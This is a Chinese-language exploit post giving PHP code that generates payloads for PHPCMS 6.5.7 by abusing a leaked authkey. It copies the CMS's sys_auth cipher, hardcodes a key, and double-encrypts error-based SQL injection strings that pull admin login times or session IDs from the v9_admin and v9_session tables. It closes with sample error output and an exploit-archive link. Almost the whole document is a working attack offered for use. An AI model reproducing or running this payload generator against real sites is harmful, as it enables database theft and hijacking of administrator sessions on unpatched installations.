PHPCMS某处设计缺陷可致authkey泄露 【针对6.5.7版本的payload生成代码】

11

<?php


/**
* 字符串加密、解密函数
*
*
* @param    string    $txt        字符串
* @param    string    $operation    ENCODE为加密，DECODE为解密，可选参数，默认为ENCODE，
* @param    string    $key        密钥：数字、字母、下划线
* @param    string    $expiry        过期时间
* @return    string
*/
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
    $key_length = 4;
    // echo "auth";
    // echo pc_base::load_config('system', 'auth_key');
    // echo "auth end";
    $key = md5($key != '' ? $key : "");

    $fixedkey = md5($key);
    $egiskeys = md5(substr($fixedkey, 16, 16));
    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
    $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));

    $i = 0; $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++){
        $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
    }
    if($operation == 'ENCODE') {
        return $runtokey . str_replace('=', '', base64_encode($result));
    } else {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }
}
#XNvNxVxghgMEoNNq9MiUMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$auth_key = "XNvNxVxghgMEoNNq9MiU";
$ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0";
function get_auth_key() {
    global $auth_key;
    global $ua;
    $pc_auth_key = md5($auth_key.$ua);
    return $pc_auth_key;
}
$auth_key2 = get_auth_key("");
$sql = "1' and (extractvalue(1,concat(0x7e,(select lastlogintime from v9_admin limit 0,1))));#	xx";
#$sql = "1' and (extractvalue(1,concat(0x7e,(select sessionid from v9_session limit 1,1))));#	okee";
#echo $auth_key2;
$sec1 = sys_auth($sql,"ENCODE",$auth_key2);
#echo $sec1;
#echo "
";
echo sys_auth($sec1,"ENCODE",$auth_key);

　　//报错代码：

 SELECT * FROM `tianyu`.`v9_member` WHERE  `userid` = '1' and (extractvalue(1,concat(0x7e,(select user()))));#' LIMIT 1

参考：http://0day5.com/archives/3251/

22